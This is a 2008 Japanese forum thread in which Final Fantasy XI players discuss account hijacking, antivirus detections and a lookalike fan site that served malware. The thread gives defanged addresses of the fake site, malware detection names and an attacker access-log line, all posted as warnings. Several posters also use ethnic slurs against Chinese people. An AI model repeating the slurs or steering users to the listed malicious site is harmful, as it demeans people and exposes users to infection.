巻き戻し報告スレが落ちちゃったので、 一応まだ復旧されてない方へのご参考までに報告します。 8/31不正アクセス 8/31垢凍結 9/1 チャットサポートでPW再発行→キャラ確認※身包み剥がされてました 9/1 キャラデータ復元依頼と公的書類送付 9/15キャラデータ復元 備考:レベは1、2ヶ月分くらい巻き戻ってました。 アイテムについてはエクレアでも戻ってこなかったものがありました。
478 :
既にその名前は使われています :2008/09/16(火) 05:41:53 ID:wuQM/6PG
200からあげ
IPアドレスからサーバー所在地調べてくれるサイトってどこだっけ?
どこだっけ じゃなくて どこでしょうか、教えていただけませんか? だろ。 社会人になって勉強して来いあほニート
JP NICとかInter NIC?それともwww.aguse.jpの方かな?
482 :
既にその名前は使われています :2008/09/16(火) 10:32:00 ID:7yHOD3e0
483 :
既にその名前は使われています :2008/09/16(火) 13:35:19 ID:DeEPkQuf
258からあげくん
484 :
既にその名前は使われています :2008/09/16(火) 13:46:12 ID:AIGhpq8c
IPひろば使ってたぜ
485 :
既にその名前は使われています :2008/09/16(火) 15:30:37 ID:+2UuDuJD
200さるべーじ
486 :
既にその名前は使われています :2008/09/16(火) 17:23:33 ID:yohkazVm
あげ
>>477 時系列がほぼ同じだw
まだ復旧連絡はまだ着ていないけど。
488 :
既にその名前は使われています :2008/09/16(火) 17:37:11 ID:h97MwBUn
>>477 それってもしかして
被害確認以前にアクセスあったのかもよ
俺の場合不正直前ぽかった
489 :
既にその名前は使われています :2008/09/16(火) 17:43:03 ID:j0LmKQv/
490 :
既にその名前は使われています :2008/09/16(火) 19:02:11 ID:WZfcViO0
age
数日前からPG2のリスト http://peerguardian○sourceforge○net/lists/spy○phpとかが URL接続エラーで更新できないんだけど なんでかな
492 :
既にその名前は使われています :2008/09/16(火) 20:30:41 ID:+2UuDuJD
>>491 公式のリストは結構エラー出るよ
ただ俺は使ってないから今回もそれが原因なのかは分からんけど
493 :
既にその名前は使われています :2008/09/16(火) 20:52:39 ID:GJf0jDtU
本人確認と不正アクセスの事実が把握できたなら、すぐに復元してくれれば 良いのに。 時間かかりすぎ。
オンラインゲームもしょせん、RMTツールでしかないからな つ記事:オンラインゲームはRMTの宝庫
×ハック ○クラック 細かいが
496 :
既にその名前は使われています :2008/09/16(火) 21:29:41 ID:+2UuDuJD
NoScriptきてるぞー
>>493 認証担当が毎週火曜日だけの出社だから無理
498 :
既にその名前は使われています :2008/09/16(火) 21:52:59 ID:GJf0jDtU
499 :
既にその名前は使われています :2008/09/16(火) 21:56:17 ID:h97MwBUn
500 :
既にその名前は使われています :2008/09/17(水) 00:02:31 ID:DeEPkQuf
あげまふ。起きたら落ちてそうなヤカン
501 :
491 :2008/09/17(水) 00:07:47 ID:XMwhEY3y
>>492 そなのかあ
ありがとう
しばらく様子見てみますage
502 :
既にその名前は使われています :2008/09/17(水) 00:08:11 ID:XMwhEY3y
あげてなかったage
503 :
既にその名前は使われています :2008/09/17(水) 00:14:24 ID:VmtHz319
おやすみ前のあげ。
504 :
既にその名前は使われています :2008/09/17(水) 00:19:43 ID:ZA1hWmTn
※※各種ソフトウェアアップデート情報※※ NoScript 1.8.1 アップデート
505 :
既にその名前は使われています :2008/09/17(水) 01:49:43 ID:PkKZ+Fpy
あげ
506 :
既にその名前は使われています :2008/09/17(水) 01:57:07 ID:EOzNtDCb
507 :
既にその名前は使われています :2008/09/17(水) 02:40:57 ID:ZA1hWmTn
しゅ
508 :
既にその名前は使われています :2008/09/17(水) 03:41:10 ID:ZA1hWmTn
しゅしゅ
509 :
既にその名前は使われています :2008/09/17(水) 03:50:14 ID:5AzQPvbp
さっき、他スレで「FF11ヴァナ・ディール菜園」を踏んだらavastがマルウェアを見つけた 敢えてURLを張らないけど気を付けてね 只今カスペオンラインスキャン中
510 :
既にその名前は使われています :2008/09/17(水) 04:03:53 ID:rkqJGY7W
>>509 カスペじゃ異常検知しないね。
誤検知かもしれないし、Avast!も最近飛躍的に検知率がよくなってるから
ひょっとしてAvast!の方が正いのかもしれない。
ところでAvast!が見つけたマルウェアの名前はなんですか?
511 :
既にその名前は使われています :2008/09/17(水) 04:04:25 ID:RNuwTKwE
>>509 見てきたがそれらしいスクリプトはないぞ?
見つけたマルウェアは何?
512 :
既にその名前は使われています :2008/09/17(水) 04:10:15 ID:5AzQPvbp
513 :
既にその名前は使われています :2008/09/17(水) 04:10:36 ID:ZA1hWmTn
危ないスクリプト、見つかりませんね<FF11ヴァナ・ディール菜園 スクリプトはいくつか入ってますけど、問題ないスクリプトしか 見当たりません
514 :
既にその名前は使われています :2008/09/17(水) 04:13:22 ID:5AzQPvbp
もしかして俺の勘違い? 俺の恥で済むからかまわないけど
515 :
既にその名前は使われています :2008/09/17(水) 04:15:47 ID:RNuwTKwE
どっちにしても直リンはやめれ
516 :
既にその名前は使われています :2008/09/17(水) 04:16:17 ID:EVmfXFVx
脈絡もなしに菜園URLとか張ってるのはちょっと怪しいけどなあ
517 :
既にその名前は使われています :2008/09/17(水) 04:16:35 ID:5AzQPvbp
あ、やっぱまずかった? 削除依頼って通じるかな?
518 :
既にその名前は使われています :2008/09/17(水) 04:17:25 ID:ZA1hWmTn
>>512 のリンク、先生が攻撃拒否しました
91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園
ttp://www ●geocities.jp/ff11seeds/index●html
このURLでなにか引っかかってます
519 :
既にその名前は使われています :2008/09/17(水) 04:21:33 ID:5AzQPvbp
削除依頼って何処でお願いしたら良いんでしょう? 何分初めてなものでして
520 :
既にその名前は使われています :2008/09/17(水) 04:23:56 ID:ZA1hWmTn
おかしいな・・・ geocities.jpからの侵入攻撃って、なんだろ・・・ 202●93.87.154 ← 普通にヤフーのIPだし
521 :
既にその名前は使われています :2008/09/17(水) 04:26:27 ID:5N8y1SS0
菜園踏んだらavastが2種類叫んだよ VBS:Malware-gen ウイルス/ワーム 080915-0, 2008/09/15 JS:Agent-AU [Expl] Exploit 080915-0, 2008/09/15
522 :
既にその名前は使われています :2008/09/17(水) 04:30:04 ID:uz4igdJy
『栽培サイト:FF11ヴァナ・ディール菜園』 ここウィルス警報発令ですか?
523 :
既にその名前は使われています :2008/09/17(水) 04:31:59 ID:ZA1hWmTn
ttp://www ●geocities.jp/ff11seed/ ← ヤフー検索で出たURL(とくに問題なし)
ttp://www ●geocities.jp/ff11seeds/index●html ←
>>512 の出したURL(先生が侵入感知)
これって、なんだろ・・・
真似た罠サイト?とかだったりする?
また一段とずる賢くなったな
525 :
既にその名前は使われています :2008/09/17(水) 04:36:35 ID:rkqJGY7W
re11.htmのスクリプトちゃんと読んでないけど、 fuckyoukaspersky とか書いてるから超怪しい。 後、このページに含まれてる clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93 これはRealPlayerで、脆弱性がある。 リアルプレイヤーを入れてなければ害はないはずだけど。
526 :
既にその名前は使われています :2008/09/17(水) 04:40:19 ID:ZA1hWmTn
>>521 踏んだのは seeeds/indexのほうですよね?
seedのほうはスクリプト数4個で、seedsのほうは20個もある
527 :
既にその名前は使われています :2008/09/17(水) 04:41:24 ID:QceLOnyf
528 :
既にその名前は使われています :2008/09/17(水) 04:41:25 ID:uz4igdJy
ファッキューですとw
529 :
既にその名前は使われています :2008/09/17(水) 04:44:38 ID:RNuwTKwE
菜園は
ttp://www ●geocities●jp/ff11seed/index●htmlが正しいはず
つまりseedsは偽装HPてことかね
530 :
既にその名前は使われています :2008/09/17(水) 04:46:18 ID:5AzQPvbp
一応元のもここのも削除依頼してきた こんなんで削除してくれるのかしらないけど
531 :
既にその名前は使われています :2008/09/17(水) 04:50:46 ID:5N8y1SS0
>>526 踏んだの512のリンクのやつね
avastだと逃してるのあるのか・・
532 :
既にその名前は使われています :2008/09/17(水) 04:54:13 ID:rkqJGY7W
今seed(本物)とseeds(偽者)のindex.htmを比較してみたけど、完全に偽サイトだね。 リンク先とかは偽者から本物のデータを参照するようにしてるから、 本家が更新されたら偽者も一緒に更新されるっていう・・・。
534 :
既にその名前は使われています :2008/09/17(水) 04:57:10 ID:RNuwTKwE
カードとかの番号引き出す成り済ましサイトと同じ要領だな サイトアドバイザーとか入れてると少しはましかね
535 :
既にその名前は使われています :2008/09/17(水) 04:57:27 ID:rkqJGY7W
削除依頼もだけど、元の書き込みした奴が犯罪者なのは明白だよね。警察に捜査依頼すべき?
536 :
既にその名前は使われています :2008/09/17(水) 04:58:32 ID:uz4igdJy
537 :
既にその名前は使われています :2008/09/17(水) 04:58:53 ID:ZA1hWmTn
>>531 ありがとうございます
どうやら偽者サイトのようですね
これ、ジオに削除依頼を出しておいたほうがいいでしょうか
というか、どなたか出されました?
>>535 しておいたほうがいいかもね〜
どうでもいい話なんだが
ウイルスサイトアドレスを唐突に書き込むやつって、大抵串使ってるからbooに突っ込んで食ってるんだけど
>>512 で出てたやつ突っ込んでみたが串じゃない返答だったw
539 :
既にその名前は使われています :2008/09/17(水) 05:00:28 ID:RNuwTKwE
夏休みぐらいに自分が引っかかったからて色々なスレにアド貼り付けてたアホがいたな まあ、サイバー(ryに通報しとけば厨房か業者か知らんが足がつくかもね
geocities.jpに削除依頼した方がいいのかもね
541 :
既にその名前は使われています :2008/09/17(水) 05:00:41 ID:5AzQPvbp
542 :
既にその名前は使われています :2008/09/17(水) 05:03:19 ID:rkqJGY7W
ちなみに、/seedsの判定は McAfee SiteAdviser → 安全表示 Google Safe Browsing API → 安全表示 Finjan → 怪しい表示 Norton → (Windows版しかないから怖くて試せない) マカフィーせめて「不明」と出せよなw ちなみにFinjanは経験的に怪しいサイトはほぼ怪しいとでるが、普通のメジャーなサイトも 怪しいと出ることが多い。日本のIT Mediaとか。
543 :
既にその名前は使われています :2008/09/17(水) 05:04:59 ID:ZA1hWmTn
>>542 参考になるかどうかわかりませんけど、侵入検知で弾いたわたしの
ソフトは、NIS2008でした
544 :
既にその名前は使われています :2008/09/17(水) 05:19:12 ID:ZA1hWmTn
ジオ、どこに連絡すればいいのかわかんない・・・ こういうことはわかりやすいところに連絡先を書いておいて欲しいな・・・
545 :
既にその名前は使われています :2008/09/17(水) 05:28:17 ID:EVmfXFVx
546 :
既にその名前は使われています :2008/09/17(水) 05:28:33 ID:bB1v+35I
seedsの方は検索してもトップには出てこないな 最近栽培関連のスレ伸びてたから心配だ と言うか、どこからそのサイトを見つけてきたの?
547 :
既にその名前は使われています :2008/09/17(水) 05:31:43 ID:EVmfXFVx
12. 他人になりすましてサイトを立ち上げること、または他人が立ち上げているサイトを模倣したサイトを掲載すること 13. ページに接続したコンピュータやネットワークに損害を与える行為 ( これには以下のものが含まれますが、この限りではありません) ・ ブラウザ・クラッシャーの設置 ・ ウイルスやワームプログラム、またはプログラムコードの公開 ・ ウイルスやワームプログラムに感染したファイルを故意に設置すること 思いっ切りジオシティーズガイドラインに触れてるから、まあ対処してくれるんじゃないかな
548 :
既にその名前は使われています :2008/09/17(水) 05:32:21 ID:5AzQPvbp
549 :
既にその名前は使われています :2008/09/17(水) 05:38:46 ID:ZA1hWmTn
>>545 >>548 ありがとうございます
とりあえずわたしも通報を入れておきました
さて・・・
攻撃を弾いたので大丈夫だとは思うけど、とりあえずスキャンしておこう・・・
550 :
既にその名前は使われています :2008/09/17(水) 05:47:08 ID:5AzQPvbp
礼には及ばん 俺の場合は身から出た錆っつーのもあるからw
552 :
既にその名前は使われています :2008/09/17(水) 05:51:06 ID:fNtF/dEP
<<551 死ね
553 :
既にその名前は使われています :2008/09/17(水) 05:51:44 ID:3ec2gQpW
554 :
既にその名前は使われています :2008/09/17(水) 05:52:23 ID:EVmfXFVx
ちょっと上のレスくらい読みなさい
555 :
既にその名前は使われています :2008/09/17(水) 05:57:47 ID:ZA1hWmTn
※※注意喚起※※
「FF11ヴァナ・ディール菜園」に本物そっくりの偽物サイトがあります
本物のURL =
ttp://www ●geocities.jp/ff11seed/
偽物のURL =
ttp://www ●geocities.jp/ff11seeds/
偽物はseedに「s」が付いてます
ジオには削除依頼を出していますが、偽物を踏むとウィルスが落ちてきますので
くれぐれも踏まないように注意してください
何のウイルスかは分からんのですか
557 :
既にその名前は使われています :2008/09/17(水) 06:03:11 ID:ZA1hWmTn
>>556 >>521 :既にその名前は使われています:2008/09/17(水) 04:26:27 ID:5N8y1SS0
菜園踏んだらavastが2種類叫んだよ
VBS:Malware-gen
ウイルス/ワーム
080915-0, 2008/09/15
JS:Agent-AU [Expl]
Exploit
080915-0, 2008/09/15
だそうです
だからおまいさんはスレの少し上を嫁と
559 :
既にその名前は使われています :2008/09/17(水) 06:04:03 ID:S1GzY0IC
おいおい・・・なんつー物騒な世の中じゃ・・・・ もうhttp自体NGワードに指定しときました
560 :
既にその名前は使われています :2008/09/17(水) 07:34:49 ID:E6cr+M/r
seedsの方、踏んでみたらノートン先生が反応 HTTP Yahoo! Messenger CYFT Ctrl Get File
>>555 罠サイトのほう、カスペじゃ検知できないように作られてる?
アーガスのカスペのマルウェアチェック素通りしてる。
562 :
既にその名前は使われています :2008/09/17(水) 08:45:20 ID:mXLU/bDL
メンテ明け早々に差出人不明でHugecheap.comのメッセ来てるわ 気持ちわりいなこれ
563 :
既にその名前は使われています :2008/09/17(水) 09:00:06 ID:4n8eurLN
あーこれは酷いな、最低だ
AVG先生とアーガスじゃ反応しないな 注意しておけよ〜
RealPlayerの脆弱性関係? ところでAntiVirはどうだい?
566 :
既にその名前は使われています :2008/09/17(水) 09:49:35 ID:P61R2rp9
Seeds/の方、ウィルスバスター2009が反応しました。 HTML_IFRAME.ATW というウィルスが隔離されていました。
567 :
既にその名前は使われています :2008/09/17(水) 09:54:41 ID:biOYpArr
敵のシナチクは、日本語完璧に理解してるぽいな。 やはり、日本の国費留学生かw
568 :
既にその名前は使われています :2008/09/17(水) 10:10:05 ID:VIFUJp1C
http://www.mozilla.gr.jp/ ただし、Firefox 3.0.2(9/16リリース予定)において、いくつかの大きな修正 がされているため、
Firefox 2 から 3 へ更新される際は充分検討の上アップデートされますようお願いいたします。
まだVUこないな・・・
■と違ってちゃんとテストしてるからいい加減なものは出せないんだろうけど。
569 :
既にその名前は使われています :2008/09/17(水) 10:14:47 ID:RNuwTKwE
>>567 都会にある中華の学校なら日、中、英は必須科目だ
進学校なら5ヶ国語とかもあるんだぜ
570 :
既にその名前は使われています :2008/09/17(水) 12:06:53 ID:DKjjIGt3
age
571 :
既にその名前は使われています :2008/09/17(水) 12:26:44 ID:3A7DVg5e
572 :
既にその名前は使われています :2008/09/17(水) 13:38:16 ID:WSc1nFwt
206からあげ Seeds/って、スクリプトを完全に不許可にしてたのに 攻撃してきたっていうのは、どんな理屈なんでしょ
3.02は延期らしいよ来週か?
574 :
既にその名前は使われています :2008/09/17(水) 14:52:21 ID:i/HJEyPo
>>572 流行ってる手口がスクリプト注入だっただけで、全部のウイルスがスクリプト使用というわけではない
576 :
既にその名前は使われています :2008/09/17(水) 15:18:11 ID:tS7jQV/9
おお 対応早いな
577 :
既にその名前は使われています :2008/09/17(水) 15:39:26 ID:/jSkJ7SD
つーかネット危険すぎ…
578 :
既にその名前は使われています :2008/09/17(水) 15:56:41 ID:1MDU8Pso
582 既にその名前は使われています New! 2008/09/17(水) 13:08:09 ID:0j//Rtx7
Pokoのサイト ウイルス感染してないか?
カスペル反応して駆除したんだが。
Bakdoor.Win32.Agent.rqkって出たんだが。
583 既にその名前は使われています sage New! 2008/09/17(水) 13:32:04 ID:aJnuHXDD
感染というか、管理人が仕込んでるようにしか見えないんだが・・・
バックドアの送信先見れば分かるよ
ポコポコがハックしてるのか?
ttp://ameblo ●jp/pokostyle/
バハスレより
うちじゃ反応しないんだがどうかな
579 :
既にその名前は使われています :2008/09/17(水) 16:01:35 ID:ttCyA7Sc
俺のとこにも差出人空白のRMT宣伝ぽいメッセきたぞ なんなんだこれは
>>578 有害なコードは見当たらんね。
除去されたのか、偽ページが別にあるのか。
>>578 俺昼過ぎにそこ見たけど何もなかったぞ
そもそもamebloのタグエディタにそんなもんは仕込めんと思うんだが・・・
何か食わされてるか心配になって調べてみたが 書き込みにある Backdoor.Win32.Agent.rqk ってカスペもトレンドマイクロもデータベースにないね ググッても該当なし
583 :
既にその名前は使われています :2008/09/17(水) 17:49:05 ID:apDiCTi6
今ってヴァナモンとかAH(競売オンライン)とか安全なの? 怖くて最近みてないんだけど・・・
584 :
既にその名前は使われています :2008/09/17(水) 17:51:47 ID:GH1yHG71
スレ住人:今安全だよ^^
その後罠が仕掛けられる
>>583 :ハックされた!おまえらのせいだ!
585 :
既にその名前は使われています :2008/09/17(水) 18:11:23 ID:/jSkJ7SD
>v<;
586 :
既にその名前は使われています :2008/09/17(水) 18:19:34 ID:i/HJEyPo
もう何を見るのも自己責任としか言えないな
昔からそうなんだけどね。
588 :
既にその名前は使われています :2008/09/17(水) 18:54:09 ID:xnK/nMZC
Bakdoor.Win32.Agent.rqkで ヤホってみたら135件だったけどな 中途半端なカキコせず詳しく書けチンカス
589 :
既にその名前は使われています :2008/09/17(水) 18:54:50 ID:xnK/nMZC
て誤爆しつれいw
SSD関連で調べていて行きついたのだけど、Enhanced Write Filter(EWF)を導入することで、OS起動後の変更を ユーザーが任意でコミットするかどうかを選択できる環境が構築できそう。 クリーンな環境を構築した上で導入すれば、ネカフェもどきのセキュリティが個人でも得られるのではないだろうか。
>>581 調べてきた
詳しく情報が出てこないなら捏造の可能性があるね
アメブロ禁止タグガイド
アメブロ禁止タグ一覧
・html ・head ・body ・frame ・frameset ・iframe ・object ・param ・server
・javascript ・form ・input ・embed ・textarea ・script
これじゃ仕込みようがないと思う
アメブロが被害出てないのはこういう事じゃないかな
geocities.jpをOpenDnsで弾いてる俺は勝ち組
593 :
既にその名前は使われています :2008/09/17(水) 20:01:51 ID:WSc1nFwt
>>588 単語の羅列に反応して出てくるだけの情報は情報とは言えません
無意味に検査しただけではだめですよ
Backdoor.Win32.Agent.rqk
Backdoor.Win32.Agentの亜種には違いないとは思うのですけど
データベースへの登録はなさそうですねぇ
594 :
既にその名前は使われています :2008/09/17(水) 20:05:54 ID:WSc1nFwt
Backdoor.Win32.Agent.ce (AVP) Backdoor.Win32.Agent.aox (Kaspersky) 関連っぽいのはこのあたりかなぁ・・・ 実はわたしのところにもいっぴきいるので、いま必死で情報探してます
595 :
既にその名前は使われています :2008/09/17(水) 20:10:21 ID:yy2HO+Y2
>>542 Googleでアド貼ってチェックしてない?
Googleだとあいまいマッチで本家が出てきて「安全」だけど、
SiteAdvisorサイトでURLチェックしたら「不明」になってたよ。
マカ(SiteAdvisor)に精査依頼と、ウィルスサイトとして投稿しておいた。
597 :
既にその名前は使われています :2008/09/17(水) 20:46:46 ID:mRgroZqM
いつから罠サイト転載スレになったんだよw
598 :
既にその名前は使われています :2008/09/17(水) 20:49:33 ID:WSc1nFwt
599 :
既にその名前は使われています :2008/09/17(水) 20:53:24 ID:wmUlENg2
沈静化してきたと思ったら大間違いだったな
600 :
既にその名前は使われています :2008/09/17(水) 21:24:33 ID:Qw+KYy3F
とりあえず
>>596 は
>>551 の引用元の本文(危険URIは省いとく)
91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園
の頭の「栽培」と後ろの「ヴァナ・ディール菜園」を消してアドをFFXI WARNINGさんとこのアドレスに書き換えてるだけ。
つーか同じヤツが書き込んでるしなあ。
ホント何したいんかわからんわ。
601 :
既にその名前は使われています :2008/09/17(水) 21:37:56 ID:fpNeVmNw
NoScript1.8.1.2来てる?DLかなんかでエラー出るけど
602 :
既にその名前は使われています :2008/09/17(水) 21:40:24 ID:AAyVqiRo
603 :
既にその名前は使われています :2008/09/17(水) 22:13:48 ID:3h97Nqg9
おれはDLできたが
605 :
既にその名前は使われています :2008/09/17(水) 23:02:17 ID:fpNeVmNw
606 :
既にその名前は使われています :2008/09/17(水) 23:03:47 ID:WSc1nFwt
※※各種ソフトウェアアップデート情報※※ NoScript 1.8.2 アップデート (←問題なくアップできました)
607 :
606 :2008/09/17(水) 23:05:52 ID:WSc1nFwt
※※各種ソフトウェアアップデート情報※※ NoScript 1.8.1.2 アップデート 1.8.「1.」2 でしたm(_ _)m
608 :
お知らせとお願い :2008/09/17(水) 23:31:30 ID:quvTp1xk
現在多忙で更新できない上にお騒がせしているmiku.xrea.jp昨日の生ログ
84.103.142.61.broad.zs.gd.dynamic.163data.com.cn - - [16/Sep/2008:18:06:10 +0900] "
GET / HTTP/1.1" 302 238
"
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=1039045744&start=20&sa=N " "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
1039045744で検索してきやがりました。注意を呼びかけているサイトが軒並み引っかかります。
:88が割と不振で原因調査してるんだったら、ざまぁなんですけどねw
とにかく163data.com.cnの攻撃再開にご注意ください。
>>595 SiteAdvisorは、以前の番地みたいなほうは安全認定でてるとこもあるけど
現行のwww.geocities.jp/userになってから全部グレーゾーンじゃなかったかなぁ。
サブドメインも一まとめに認定してたと思います。
(miku.xrea.jpもxrea.jpとしての扱いですし)
</seedsについてお願い>
スレを読んだ感じだとサーバ内にドロッパ設置してたようですが
状況把握できた方いらっしゃいませんでしょうか?
もしくは/seedsの魚拓とかファイルDLしてお持ちの方いらしたら
お手数ですがレスもしくはご連絡いただけるとすごく喜びます。
609 :
既にその名前は使われています :2008/09/17(水) 23:39:37 ID:Qw+KYy3F
610 :
既にその名前は使われています :2008/09/18(木) 00:21:34 ID:0WcOk/15
>>608 ソースは保存してありますけど、それでいいのかな
611 :
既にその名前は使われています :2008/09/18(木) 00:47:18 ID:0WcOk/15
>>608 参考にはならないかもしれませんけど
HTTP Yahoo! Messenger CYTF Ctrl GetFile
↑NIS2008が遮断した 202●93.87.154:80 からの侵入の試みです
そのときに落ちてきたと思われるのが Backdoor.Win32.Agent.rqk
感染したのはハンゲのスターターらしいのですけど、それ、スキャンで
引っかかるのにそのフォルダ(Downloaded Program Files)に探しに行くと
いないんですよね(隠しとかはぜんぶ表示させるようにしてあります)
何回か試してみて、どうしても探せないのでそのまま削除しちゃいました
Backdoor.Win32.Agent の亜種だと思うのですけど、スクリプト以外だと
IRCコマンドの実行とかになるのでしょうか
612 :
既にその名前は使われています :2008/09/18(木) 00:59:47 ID:Ymi7TbYB
おやすみ前のあげ。
最近ビビって毎日完全スキャンしてるんだけど(感染してからじゃ遅いのはわかってるけど) あんまやりすぎるとHDDいかれちゃうかな?
614 :
既にその名前は使われています :2008/09/18(木) 01:41:46 ID:D8au9qIA
アメブロ、あの自由度の低さが敷居を上げていたわけか…
615 :
既にその名前は使われています :2008/09/18(木) 02:14:14 ID:iFkCwsfx
※※各種ソフトウェアアップデート情報※※ NoScript 1.8.1.3 アップデート
616 :
既にその名前は使われています :2008/09/18(木) 02:16:23 ID:0WcOk/15
617 :
既にその名前は使われています :2008/09/18(木) 03:14:30 ID:VJiokB+D
とりあえずnEIJ3oABをサイバーの方と運営に通報してきた 愉快犯はガクブルって家族に迷惑かけて泣け
618 :
既にその名前は使われています :2008/09/18(木) 08:13:15 ID:39T3gO+s
250まで下がってた
619 :
既にその名前は使われています :2008/09/18(木) 09:44:08 ID:7WpJbkU3
>>615 ありがとう。
あれ、でも昨日アップデートしたと思ったんだけどなぁ。また更新されたのか。とりあえず更新しました。
620 :
既にその名前は使われています :2008/09/18(木) 10:59:26 ID:yq/n/Tbz
621 :
既にその名前は使われています :2008/09/18(木) 11:22:37 ID:IrkBb8P2
罠サイト張ってる奴、またODNじゃねぇだろうな・・・ もう規制は勘弁してくれよ
622 :
既にその名前は使われています :2008/09/18(木) 11:31:32 ID:oQ7YRFQA
>>619 このところ立て続けにヴぁーじょんが上がってるよ
623 :
既にその名前は使われています :2008/09/18(木) 12:14:07 ID:YG/JF+kY
その変換やめる気はにいのか?;
624 :
既にその名前は使われています :2008/09/18(木) 13:35:57 ID:gZFmwDAS
げ
625 :
既にその名前は使われています :2008/09/18(木) 13:56:56 ID:OdWuvaEr
ヴぁあああああああんが1ヴぁああああああああああん
626 :
既にその名前は使われています :2008/09/18(木) 14:09:13 ID:phQUrscp
報告スレ落ちてるのでここに報告させてもらうね 被害確認7/13 サポセンチャットで相談不正アクセス調査依頼 7月終わりごろ 不正アクセス調査結果来たのが9/11だったかな んでパス復旧してもらって先週末にすぐ復旧依頼送った んでさっきインしたら巻き戻っていた ペンギン村住人だったので特殊な例ってことで おかえりなさい2500万G
627 :
既にその名前は使われています :2008/09/18(木) 14:09:55 ID:phQUrscp
あ、ちなみに依頼送ってから復旧の間凍結なし いきなり巻き戻ってた
628 :
既にその名前は使われています :2008/09/18(木) 15:13:46 ID:7/OQP30H
>>626 ー627
全て慨出。
住所が異世界で〜の理由もすでに過去スレで語られた。
てか、迷惑住所書いて、回りに迷惑かけた自分を先に反省してくれい。
そんな迷惑事を意気揚々と報告されて、マネされるとさらに面倒にしかならん。
あ、保守ありがとね〜
629 :
既にその名前は使われています :2008/09/18(木) 15:24:28 ID:H8weWlm/
NoScriptがまたVer.UPしている age
630 :
既にその名前は使われています :2008/09/18(木) 15:35:12 ID:hTnSTPcP
>>628 迷惑ってwハックした垢使い続けたい業者ですか?w
回りってスクエニのこと?w
つか何いきがってんの?wイミフw
何だこいつ
632 :
既にその名前は使われています :2008/09/18(木) 15:50:55 ID:CzJCiZoR
シナチクだろ
633 :
既にその名前は使われています :2008/09/18(木) 16:13:10 ID:1TWH+eNv
文字通りナメック星人だろ 前にも大暴れしてた子
634 :
既にその名前は使われています :2008/09/18(木) 16:23:40 ID:qTfAlswk
>>611 先ほど自分もカスペルでスキャンしたら発見して削除しました。
Backdoor.Win32.Agent.rqk
c:\windows\downloaded program files\hgstartjp25.exe
見つかったのは同じくハンゲのスターターのようですね
誤検知だね。報告しといた。
637 :
既にその名前は使われています :2008/09/18(木) 17:35:03 ID:bX+SbjLp
seedsサイトの問題とカスペルスキーの誤検出が偶然に重なっただけかぁ かなり慌てちゃった・・・
638 :
既にその名前は使われています :2008/09/18(木) 17:50:11 ID:gdBAHbNr
Downloaded Program FilesフォルダとかContent.IE5フォルダってアドレスバーに直打ちしないと出てこないよねw
639 :
既にその名前は使われています :2008/09/18(木) 17:56:35 ID:bX+SbjLp
>>638 Explorerの表示設定だと思いますよ
「ツール→フォルダオプション→表示タブ→ファイルとフォルダの表示」で
「すべてのファイルとフォルダを表示する」を選択
同じく「保護されたオペレーティングシステムファイルを表示しない(推奨)」の
チェックを外す
これしてみると、普通にExplorerで見ることできます
返答あり。 HgStartJp25.exe We are sorry, it is false alarm. It will be fixed as soon as possible. Thank you for your help. すぐ直すそうだ。
641 :
既にその名前は使われています :2008/09/18(木) 18:33:17 ID:emcJszXN
>>639 いや、その設定してもなお、表示されないフォルダだよ。
少なくともXPまではね。Vistaは持ってないから知らないが。
アドレスバー直打ちすればアクセス可能だけどね。
642 :
既にその名前は使われています :2008/09/18(木) 18:47:56 ID:rMuKVct8
>>641 Explorerの表示設定すら弄れないようじゃ、アンタのPCはウィルスだらけだろうな
643 :
既にその名前は使われています :2008/09/18(木) 19:54:40 ID:bX+SbjLp
644 :
既にその名前は使われています :2008/09/18(木) 20:14:00 ID:x9jqs78J
>>641 どんだけウィルス入ってるか楽しみだなw
ハックは今週末か来週末ですな
早めにPS2でパス変更を
645 :
既にその名前は使われています :2008/09/18(木) 20:14:33 ID:/H3RM02n
646 :
既にその名前は使われています :2008/09/18(木) 20:20:00 ID:bX+SbjLp
>>641 ひょっとしたら管理者権限でログオンしてないと隠しは見られないのかなと
思って試してみましたけど、制限ユーザーでも隠しファイルやフォルダは
見ることができました
くどいですけど、システムはWindows XP(SP3)です
本当に見られないとすれば、なにか壊れてる可能性ありますよ
647 :
既にその名前は使われています :2008/09/18(木) 20:45:14 ID:n2rN/cSy
Downloaded Program Filesフォルダは見えるが、Content.IE5フォルダは見えないな・・・ ってか、ずっとアルファベット順に並んでると思ったフォルダが Downloaded Program Filesといくつかはちょっと離れたところにあったんで見落としてたわ 自分の場合、Temporary Internet Filesはデフォルトの場所から移動させてあるんだが、 デフォルトの位置にはContent.IE5フォルダが見える、隠し属性になってて半透明。 (C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files) で、実際使ってる方の場所のContent.IE5フォルダはやはり見えない。 (自分の場合はE:\tmp\Temporary Internet Files) E:\tmp\Temporary Internet Files\Content.IE5ってアドレスバーに入れれば見える。 そうすると、英数8文字の謎のフォルダ4つと、index.dat、desktop.iniがある。 この、index.datが、どんどん大きくなっても削除できなくて困ってるw
648 :
既にその名前は使われています :2008/09/18(木) 20:57:58 ID:VaXIgqcP
649 :
既にその名前は使われています :2008/09/18(木) 21:13:28 ID:n2rN/cSy
すまんwww俺641wwwww
650 :
既にその名前は使われています :2008/09/18(木) 21:16:41 ID:x9jqs78J
謎の8文字のフォルダはカタカナにして全部並べて後ろから読むと謎が解けるってコナン君が言ってた
651 :
既にその名前は使われています :2008/09/18(木) 21:26:51 ID:bX+SbjLp
>>647 半透明のはダブルクリックすれば中身開きますよ
652 :
既にその名前は使われています :2008/09/18(木) 21:35:58 ID:bX+SbjLp
>>647 Content.IE5はいくつかあっちこっちにありますけど(環境の違い)
Temporary Internet Filesに半透明に出てきたものをExplorerから
ダブルクリックで開けます
654 :
既にその名前は使われています :2008/09/18(木) 21:52:16 ID:5OtzvxF/
で、1ヶ月以上かかるのか?巻き戻し
655 :
既にその名前は使われています :2008/09/18(木) 22:31:05 ID:x9jqs78J
656 :
既にその名前は使われています :2008/09/18(木) 22:51:54 ID:vKiovuhn
OpenDnsでOk
